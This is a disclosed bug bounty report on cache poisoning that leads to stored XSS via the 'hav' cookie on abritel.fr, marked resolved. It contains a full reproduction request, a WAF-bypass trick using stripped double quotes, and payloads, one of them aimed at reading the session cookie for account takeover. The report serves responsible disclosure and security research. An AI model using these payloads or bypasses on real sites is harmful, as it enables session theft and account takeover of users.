Cache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover)

Disclosed: 2023-04-01 19:59:48 By bombon To expediagroup_bbp
High
Vulnerability Details
## Summary: Report #1698316 was closed as resolved You told me that the stored XSS was going to be resolved since "As this relies on the same root cause, we will be closing it as duplicate", but no abritel.fr has a strong WAF, however the server hides double quotes, allowing to bypass the WAF e.g The server blocks `</script`but if I send `</sc"ript>` WAF is bypassed and the output is </script> ## Steps To Reproduce: 1-> Send this request ```http GET /annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js?xxxd HTTP/2 Host: www.abritel.fr Cookie: hav=xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.abritel.fr/signup?enable_registration=true&redirectTo=%2Fsearch%2Fkeywords%3Asoissons-france-%28xss%29%2FminNightlyPrice%2F0%3FpetIncluded%3Dfalse%26filterByTotalPrice%3Dtrue%26ssr%3Dtrue&referrer_page_location=serp Upgrade-Insecure-Requests: 1 Te: trailers ``` 2-> Using another browser visit: https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.jpeg?xxxd Exploit: This is the payload to extract the HASESSIONV3 xss"</sc"ript><sv"g/onloa"d=aler"t"(window.INITIAL_STATE.system.cookie)> ## Supporting Material/References: {F2016192} ## Impact Stored XSS to Account Takeover
Actions
View on HackerOne
Report Stats
  • Report ID: 1760213
  • State: Closed
  • Substate: resolved
  • Upvotes: 98
Share this report